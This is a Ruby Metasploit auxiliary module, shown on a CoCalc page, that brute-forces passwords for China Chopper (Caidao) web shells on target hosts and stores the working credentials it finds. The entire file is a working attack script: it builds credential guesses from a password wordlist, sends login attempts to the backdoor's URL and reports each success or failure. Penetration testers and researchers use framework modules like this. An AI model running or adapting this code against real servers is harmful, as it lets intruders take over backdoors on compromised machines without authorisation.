CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'metasploit/framework/credential_collection'
7
require 'metasploit/framework/login_scanner/caidao'
8

9
class MetasploitModule < Msf::Auxiliary
10
  include Msf::Exploit::Remote::HttpClient
11
  include Msf::Auxiliary::Scanner
12
  include Msf::Auxiliary::Report
13
  include Msf::Auxiliary::AuthBrute
14

15
  def initialize(info = {})
16
    super(update_info(info,
17
      'Name'           => 'Chinese Caidao Backdoor Bruteforce',
18
      'Description'    => 'This module attempts to bruteforce chinese caidao asp/php/aspx backdoor.',
19
      'Author'         => [ 'Nixawk' ],
20
      'References'     => [
21
        ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],
22
        ['URL', 'https://www.mandiant.com/resources/breaking-down-the-china-chopper-web-shell-part-ii'],
23
        ['URL', 'https://www.exploit-db.com/docs/27654.pdf'],
24
        ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/TA15-314A'],
25
        ['URL', 'http://blog.csdn.net/nixawk/article/details/40430329']
26
      ],
27
      'License'        => MSF_LICENSE
28
    ))
29

30
    register_options(
31
      [
32
        OptString.new('TARGETURI', [true, 'The URL that handles the login process', '/caidao.php']),
33
        OptPath.new('PASS_FILE', [
34
          false,
35
          'The file that contains a list of of probable passwords.',
36
          File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')
37
        ])
38
      ])
39

40
    # caidao does not have an username, there's only password
41
    deregister_options('HttpUsername', 'HttpPassword', 'USERNAME', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'DB_ALL_USERS')
42
  end
43

44
  def scanner(ip)
45
    @scanner ||= lambda {
46
      cred_collection = build_credential_collection(
47
        # The LoginScanner API refuses to run if there's no username, so we give it a fake one.
48
        # But we will not be reporting this to the database.
49
        username: 'caidao',
50
        password: datastore['PASSWORD']
51
      )
52

53
      return Metasploit::Framework::LoginScanner::Caidao.new(
54
        configure_http_login_scanner(
55
          host: ip,
56
          port: datastore['RPORT'],
57
          uri: datastore['TARGETURI'],
58
          cred_details:       cred_collection,
59
          stop_on_success:    datastore['STOP_ON_SUCCESS'],
60
          bruteforce_speed:   datastore['BRUTEFORCE_SPEED'],
61
          connection_timeout: 5,
62
          http_username: datastore['HttpUsername'],
63
          http_password: datastore['HttpPassword']
64
        ))
65
    }.call
66
  end
67

68
  def report_good_cred(ip, port, result)
69
    service_data = {
70
      address: ip,
71
      port: port,
72
      service_name: 'http',
73
      protocol: 'tcp',
74
      workspace_id: myworkspace_id
75
    }
76

77
    credential_data = {
78
      module_fullname: self.fullname,
79
      origin_type: :service,
80
      private_data: result.credential.private,
81
      private_type: :password,
82
    }.merge(service_data)
83

84
    login_data = {
85
      core: create_credential(credential_data),
86
      last_attempted_at: DateTime.now,
87
      status: result.status,
88
      proof: result.proof
89
    }.merge(service_data)
90

91
    create_credential_login(login_data)
92
  end
93

94
  def report_bad_cred(ip, rport, result)
95
    invalidate_login(
96
      address: ip,
97
      port: rport,
98
      protocol: 'tcp',
99
      private: result.credential.private,
100
      realm_key: result.credential.realm_key,
101
      realm_value: result.credential.realm,
102
      status: result.status,
103
      proof: result.proof
104
    )
105
  end
106

107
  # Attempts to login
108
  def bruteforce(ip)
109
    scanner(ip).scan! do |result|
110
      case result.status
111
      when Metasploit::Model::Login::Status::SUCCESSFUL
112
        print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential.private}'")
113
        report_good_cred(ip, rport, result)
114
      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
115
        vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)
116
        report_bad_cred(ip, rport, result)
117
      when Metasploit::Model::Login::Status::INCORRECT
118
        vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential.private}'")
119
        report_bad_cred(ip, rport, result)
120
      end
121
    end
122
  end
123

124
  def run_host(ip)
125
    unless scanner(ip).check_setup
126
      print_brute(:level => :error, :ip => ip, :msg => 'Backdoor type is not support')
127
      return
128
    end
129

130
    bruteforce(ip)
131
  end
132
end
133

134